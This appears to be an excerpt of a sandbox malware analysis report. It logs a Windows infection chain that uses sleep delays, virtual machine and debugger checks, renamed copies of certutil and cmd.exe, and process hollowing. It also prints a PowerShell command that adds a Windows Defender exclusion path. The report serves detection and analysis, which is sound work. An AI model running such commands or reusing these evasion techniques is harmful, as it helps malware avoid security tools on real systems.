                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98340s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98058s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97658s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97450s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97290s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97130s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96991s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96848s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96685s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96574s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96464s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96337s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96217s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99868s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99648s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99373s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99092s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98943s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98757s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98620s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98497s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98343s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97811s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97476s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97332s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97188s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96915s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96807s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96694s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96585s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96475s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96321s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199841s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199722s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199597s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198821s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198614s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198392s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198228s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198072s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197864s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197704s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197560s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197387s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197208s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197052s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1196735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1196096s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195729s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195572s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195393s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195265s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195137s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1194990s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4832Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 5364Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 6756Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 4613 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2444Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif TID: 2168Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6616Thread sleep time: -90000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7D1537B4C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7D1537B4C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F138D440
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF7F13CD4A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF7F13CB3D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1403674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF7F1403674
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1421B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF7F1421B04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14219F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF7F14219F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF7F13CDBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF7F13C5E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF7F142234C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF7F13BC6F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1423100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F1423100
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F14210C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1426F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF7F1426F80
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02EA5908
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF7F140511C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99857
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99734
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99616
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99490
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99340
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99213
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99059
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98933
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98745
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98601
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98340
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98218
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98058
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97658
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97450
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97290
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97130
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96991
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96848
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96685
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96574
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96464
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96337
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96217
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99868
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99648
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99373
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99092
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98943
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98757
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98620
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98497
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97811
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97476
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97332
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97188
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97051
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96915
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96807
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96694
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96585
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96475
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96321
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199841
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199722
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199597
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198821
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198614
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198392
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198072
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197864
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197704
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197560
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197387
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197208
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197052
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196735
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196096
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195729
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195572
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195393
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195265
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195137
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1194990
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: Native_neworigin.exe, 00000020.00000002.1908517651.00000000008CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHZ?
                    Source: Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2842577737.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2282224682.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2429430212.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2528462938.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2166690371.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2676022398.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547195951.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2592856987.000000000018A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8[
                    Source: xpha.pif, 0000001E.00000002.1766619799.0000000002C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformation

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,15_2_02EBF744
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15363FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7D15363FC
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02EB894C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15293B0 SetUnhandledExceptionFilter,4_2_00007FF7D15293B0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1528FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7D1528FA4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1528FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7D1528FA4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15293B0 SetUnhandledExceptionFilter,8_2_00007FF7D15293B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14553E0 SetUnhandledExceptionFilter,9_2_00007FF7F14553E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1454E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF7F1454E18
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Allocates memory in foreign processes
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                    Drops or copies certutil.exe with a different name (likely to bypass HIPS)
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Sample uses process hollowing technique
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000Jump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                    Writes to foreign memory regions
